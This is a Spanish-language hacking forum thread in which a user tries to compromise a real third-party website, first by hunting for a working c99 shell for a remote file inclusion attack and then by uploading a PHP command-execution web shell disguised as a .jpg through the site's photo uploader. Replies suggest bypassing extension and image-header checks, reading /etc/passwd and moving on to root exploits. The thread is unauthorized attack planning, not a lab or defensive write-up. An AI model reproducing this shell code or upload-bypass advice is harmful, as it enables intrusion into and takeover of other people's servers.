Hola compañeros, llevo toda la noche y toda la mañana intentnado subir una shell c99 a un hosting gratuito (000webhost, eshost.es) etc pero no consigo hacerla funcionar, me la detecta el hosting o algo porque cuando quiero hacer el ataque rfi me dice que la pagina no existe cuando redirecciono..., he buscado con los famosos dorks de google, pero las unicas que he encontrado son .php y por lo tanto se ejecutan en el servidor donde están alojadas y no en el servidor destino.. mi pregunta es si alguien conoce alguna shell ya subida y que sea funcional en estos momentos, agradecería cualquier tipo de sugerencia. muhcas gracias.
primero esto no va aqui. va en auditoria web
el hosting estara protegido no solo con un artivirus si no sus directivas y configuraciones evitaran que algunas funciones que utiliza esta webshell se puedan ejecutar bien. mas bien busca una vulnerabilidad en el origen a que me refiero pues que busques mas atras busca en la web principal donde te registras.

Salu2!
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

Siento la equivocación con el post, cuando me refiero a que el hosting me bloquea la shell me refiero a mi hosting no al servidor victima.. no estoy segudo de haber entendido lo que me dices, la variable del servidor victima está activa en cualquier seccion del dominio en cuestión. el caso es que no consigo ejecutarla nada mas que en mi propio hosting. :/
si es lo que te entendi fijate
supongamos que tu tienes un VPS que no es otra cosa que para que lo entiendas un pedaso del Server donde se almacenan muchos de estos

mira esto:
var/www/websSERVER/zito123/www_public/[este es el pedaso que te dan a ti] evidentemente tus permisos de leer modificar ejecutar empiezan a partir de esta ruta
y C99 se aprovecha de esos permisos. No por que subas una webshell vas a tener mas de los que tienes

var/www/websSERVER/websSERVER/Michb123/
var/www/websSERVER/websSERVER/indetectables/
var/www/websSERVER/websSERVER/.../

si logras acceder al archivo /etc/passwd veras los usuarios y directorio de trabajo de los usuarios
zito123 :*:0:0:System user:var/www/websSERVER/ zito123 /www_public/:/usr/bin/false

Mirate algo de Server Hardening
aqui tambien tienes algo para orientarte
http://www.indetectables.net/viewtopic.php?f=59&t=28204

si quieres unos permisos mayores ya hablamos de root/local exploit
[Enlace externo eliminado para invitados]

Salu2!
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

una duda..
he encontrado una seccion para subir fotos en una web asique he subido este código:

Código: Seleccionar todo

<?php
exec($_GET[cmd],$exit);
foreach($exit as $line) { echo "$line<br>"; }
?>
exec();
renombrando el archivo a .jpg, la "foto" se ha subido al servidor con esta ruta

Código: Seleccionar todo

http://www.xxxxxxx.xx/screenshots/?image_id=e9b8e948b19ca740b942dbc7a654658d
pero cuando intento ejecutar el exploit

Código: Seleccionar todo

http://www.xxxxxxxx.xx/screenshots/?image_id=e9b8e948b19ca740b942dbc7a654658d?cmd=dir
el explorador me responde "the image cannot be displayer because it contains errors", la pregunta es, como puedo solucionar esto y llegar a ejecutar algun comando?
ahora abriendola con el konqueror del mismo modo que antes me da opcion de descargarla, y cuando la abro... :

Código: Seleccionar todo

<br />
<b>Warning</b>:  readfile(users_images/e9b8e948b19ca740b942dbc7a654658d?cmd=print ls.jpg) [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in <b>/homez.380/aconstru/xxxxx/screenshots/index.php</b> on line <b>10</b><br />
por lo que puedo ver el problema es que el codigo añade despues del hash la extension del archivo por lo tanto me lo inutiliza ya que no puedo pasarle los parametros...
no se me ocurre ninguna solución, pense en añadirle ".jpg)" al final del hash y cerrar la función pero tampoco saco resultados positivos...
alguna idea vosotos que sois gente mas experimentada??
@Zito hay varias posibles respuestas!
Primero deberias cambiarle la extension .jpg por .php o en el lenguaje que este la shell! Suele haber errores al interpretar por no hacer esto!
Segunda que tengan algun metodo para comprobar si la imagen realmente no es una imagen! Viendo la cabecera de la imagen, etc...
Tercera Hubo errores al momento de subirla! Trata de hacerlo de nuevo!
Regresa a contarnos como te fue! =D
1337 & culture!
Perdonad la ausencia, como comentabas khc lo de las extensiones, algo asi había leido por lo que habia probado desilusionandome por el control de extensiones... xD
cuando quise subir el jpg a secas me lo detecto como malicioso asique tuve que añadirle unas lineas de codigo en la cabecera para saltarme el control..
por lo que he leido, la vulnerabilidad que ejecutaba codigo desde un .jpg era de IE y esta correjida...o me he informado mal... (puede ser muy probable xD)
estoy frustrado, tengo un file upload y no soy capaz de explotarlo T.T
no se si te sigo... hacerme un uploader vulnerable? y como introduzco ese codigo en el servidor? :S no se si te sigo... xD
:O muchisimas gracias deck!
ahora mismo lo pondre en practica en un rato te comento mis experiencias :)
tengo un pequeño problema... el archivo que intento subir como .jpg para luego hacerle todo el proceso con el addon, no se me sube, el uploader me dice que no es un archivo correcto, yo creo recordar que para eso habia un codigo que se insertaba a modo de cabecera para que el uploader crellese que eso era una imagen real y no codigo dentro de una extension de imagen, pero no recuerdo el método, el caso es que he intentado subir el mismo codigo con misma extension y todo y ya no me deja subirlo, sin embargo sigue subido el del proceso anterior que comentaba ahi arriba y a la hora de descargarlo es exactamente al que intento subir por lo tanto deduzco que han modificado el codigo del uploader en estos 2 meses...
Responder

Volver a “Exploits”